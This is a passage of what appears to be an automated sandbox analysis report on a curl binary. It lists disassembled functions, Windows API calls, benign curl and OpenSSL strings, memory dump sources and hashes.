                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: sendto$ErrorLast
                                                                                                                                                                    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                                                                                                                                                    • API String ID: 4042023021-1785996722
                                                                                                                                                                    • Opcode ID: 5994d54e26fa4cb54ed9baa35f3940ae785bd70c19a58b40b0b688a2e4025f13
                                                                                                                                                                    • Instruction ID: 3b0b7dcf89ec5206d9b06ea89a799f5155ca287d6c1dd8f6b6dcdaadfa6ad17e
                                                                                                                                                                    • Opcode Fuzzy Hash: 5994d54e26fa4cb54ed9baa35f3940ae785bd70c19a58b40b0b688a2e4025f13
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F819D71204B009BD7229B38DC85BE7B7E4EF59301F04492EEA9A87391D776A818DB61
                                                                                                                                                                    Function 0025BD32 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BD73
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BDA2
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BDF5
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BE12
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BE65
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BE82
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0025BED5
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 0025BEF8
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000), ref: 0025BF04
                                                                                                                                                                    • GlobalMemoryStatus.KERNEL32(?), ref: 0025BF16
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000), ref: 0025BF84
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountTick$CloseCurrentFreeGlobalHandleLibraryMemoryProcessStatus
                                                                                                                                                                    • String ID: f#
                                                                                                                                                                    • API String ID: 2654232908-1456218785
                                                                                                                                                                    • Opcode ID: 3663641aa31918432f88026cfd1d337b8d07f3cd808b894b12d51ed5fdb97cd9
                                                                                                                                                                    • Instruction ID: a4906b6e5a1ee55432824364b75dc1daae34d0f4ce76bcec518e750523fd1303
                                                                                                                                                                    • Opcode Fuzzy Hash: 3663641aa31918432f88026cfd1d337b8d07f3cd808b894b12d51ed5fdb97cd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A717E70A2061A8BCF229F24CC857AEB779BF41311F5441A9DE09A7150EB30DE98CF59
                                                                                                                                                                    Function 001F89A0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 256COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 001F8A2D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                    • String ID: $ $%s%s%s$HOME$_netrc$login$machine$machine$password
                                                                                                                                                                    • API String ID: 237503144-3129465328
                                                                                                                                                                    • Opcode ID: 1661f75ac967cbe0ea62c825f85263f0221fbde597417da42e83de41fb902fce
                                                                                                                                                                    • Instruction ID: 57e98b87c6d483f4bd4ef838e99edb55c69a8dc4636c23a1423f5c4c859d9f57
                                                                                                                                                                    • Opcode Fuzzy Hash: 1661f75ac967cbe0ea62c825f85263f0221fbde597417da42e83de41fb902fce
                                                                                                                                                                    • Instruction Fuzzy Hash: 41910770A0938A8FD7269B2488017FBBBD4AF89344F08092DFA8597281DF71D945C7B7
                                                                                                                                                                    Function 001E94E0 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 218COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: %15[^?&/:]://%c$Disables POST, goes with %s$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch from POST to GET
                                                                                                                                                                    • API String ID: 1927824332-3364601050
                                                                                                                                                                    • Opcode ID: 49dc30f8cf1126456ae5168617f8c8a6e8e1b50e13f9d5a85546eae3bdecd641
                                                                                                                                                                    • Instruction ID: f6b4142247f2d7373854f748a31c250e615c79088f0ba721f847f26d36eb0723
                                                                                                                                                                    • Opcode Fuzzy Hash: 49dc30f8cf1126456ae5168617f8c8a6e8e1b50e13f9d5a85546eae3bdecd641
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C813AB0B00EC26BD7199B35CC467EEF794BF55305F04432EE5198A282DB74A9A8CBD1
                                                                                                                                                                    Function 001DACB0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 142COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 001DACF9
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000), ref: 001DAD46
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 001DADE8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                    • String ID: ALL_PROXY$NO_PROXY$_proxy$all_proxy$http_proxy$no_proxy
                                                                                                                                                                    • API String ID: 237503144-2383259138
                                                                                                                                                                    • Opcode ID: 7fff49ee43f0c96b70362a325c193552eb35cff6bce98f9d86ac9c72a31c97fb
                                                                                                                                                                    • Instruction ID: c8d5439c1cc29f81aa1475aa663c48955caf724a24ca09d72e0f31a2b1f746b4
                                                                                                                                                                    • Opcode Fuzzy Hash: 7fff49ee43f0c96b70362a325c193552eb35cff6bce98f9d86ac9c72a31c97fb
                                                                                                                                                                    • Instruction Fuzzy Hash: A94159B15043825BE736EB709846BEBB7996F54340F48093EE98987342EB70E918C793
                                                                                                                                                                    Function 001E2730 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 127networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\ssl_lib.c, xrefs: 001E27E5
                                                                                                                                                                    • SSL read: %s, errno %d, xrefs: 001E2886
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\ssl_lib.c, xrefs: 001E276C
                                                                                                                                                                    • select/poll on SSL socket, errno: %d, xrefs: 001E28B0
                                                                                                                                                                    • SSL shutdown timeout, xrefs: 001E2899
                                                                                                                                                                    • SSL_ERROR_WANT_WRITE, xrefs: 001E2856
                                                                                                                                                                    • SSL_ERROR_WANT_READ, xrefs: 001E2843
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\ssl\ssl_lib.c$..\..\openssl\openssl\ssl\ssl_lib.c$SSL read: %s, errno %d$SSL shutdown timeout$SSL_ERROR_WANT_READ$SSL_ERROR_WANT_WRITE$select/poll on SSL socket, errno: %d
                                                                                                                                                                    • API String ID: 1452528299-1885533763
                                                                                                                                                                    • Opcode ID: ba0ad914d064cb7bd76869ceb29bea4f4fc845e60fb2c1140618cc2a6355fb60
                                                                                                                                                                    • Instruction ID: 803a91afc47b3fd57c57353bfb1c1db0c38da1d391896c3aa87a5693dd45aa65
                                                                                                                                                                    • Opcode Fuzzy Hash: ba0ad914d064cb7bd76869ceb29bea4f4fc845e60fb2c1140618cc2a6355fb60
                                                                                                                                                                    • Instruction Fuzzy Hash: E2417D71A047419BD728AF20EC93FEA73E9AF54318F10062DF866462C2EB719E55C792
                                                                                                                                                                    Function 0022AB10 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000009,?), ref: 0022AB30
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 0022AB40
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0022AB64
                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 0022AB6A
                                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 0022AB85
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0022AB93
                                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 0022ABCE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation
                                                                                                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                    • API String ID: 1233653401-1672312481
                                                                                                                                                                    • Opcode ID: 43bbab390ff55f59d49bca64cb51b5bd3eb73d319ecafef827ac87c308e97ee5
                                                                                                                                                                    • Instruction ID: 2ec0b935d2315b4062a88937965d42d573a1fdf52425957b405834c97de6b4ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 43bbab390ff55f59d49bca64cb51b5bd3eb73d319ecafef827ac87c308e97ee5
                                                                                                                                                                    • Instruction Fuzzy Hash: 2131B431A10619ABCB209FB8FC45AAEB76CEB54714F10426AE816D71D1EB709E11CB51
                                                                                                                                                                    Function 002C1C4B Relevance: 15.3, APIs: 10, Instructions: 281COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 75acef7fda72d5d9c9f1c8ef5d84e8be799735b7c0030b3f492b54d396427137
                                                                                                                                                                    • Instruction ID: 08fc6b58e3b4d9c836583005d2b09578338c5627f2ad54ad286317bccf007812
                                                                                                                                                                    • Opcode Fuzzy Hash: 75acef7fda72d5d9c9f1c8ef5d84e8be799735b7c0030b3f492b54d396427137
                                                                                                                                                                    • Instruction Fuzzy Hash: 94B14C71D20616AECB20DFA9C845BADB7F8BF0A710F14421EF415D7692E774D860CBA0
                                                                                                                                                                    Function 002422E0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 278COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(..\..\openssl\openssl\crypto\bio\bss_file.c,0000018E), ref: 00242508
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
